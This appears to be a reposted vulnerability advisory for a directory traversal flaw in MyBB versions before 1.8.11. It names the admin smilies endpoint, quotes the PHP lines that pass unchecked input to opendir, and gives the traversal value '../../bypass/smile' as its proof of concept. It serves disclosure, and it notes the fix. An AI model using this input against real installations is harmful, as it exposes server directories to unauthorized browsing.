扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
Description: ============ product: MyBB Homepage: https://mybb.com/ vulnerableversion: < 1.8.11 Severity: Low risk =============== Proof of Concept: ============= vulnerability address:http://127.0.0.1/mybb_1810/Upload/admin/index.php?module=config-smilies&action=add_multiple vulnerabilityfile directory:/webroot/mybb_1810/Upload/admin/modules/config/smilies.php vulnerabilityCode: Line 326 $path = $mybb->input['pathfolder']; Line 327 $dir = @opendir(MYBB_ROOT.$path); if we input "pathfolder" to "../../bypass/smile",Directory Traversal success! ============ Fixed: ============ This vulnerability was fixed in version 1.8.11 <blockquote class="wp-embedded-content" data-secret="sIElkimi6j"><a href="https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/" target="_blank"rel="external nofollow" class="external" >MyBB 1.8.11 & Merge System 1.8.11 Release</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“MyBB 1.8.11 & Merge System 1.8.11 Release” — MyBB Blog" src="https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/embed/#?secret=TYRxNbqX8D#?secret=sIElkimi6j" data-secret="sIElkimi6j" frameborder="0" marginmarginscrolling="no"></iframe> ============= |
体验盒子
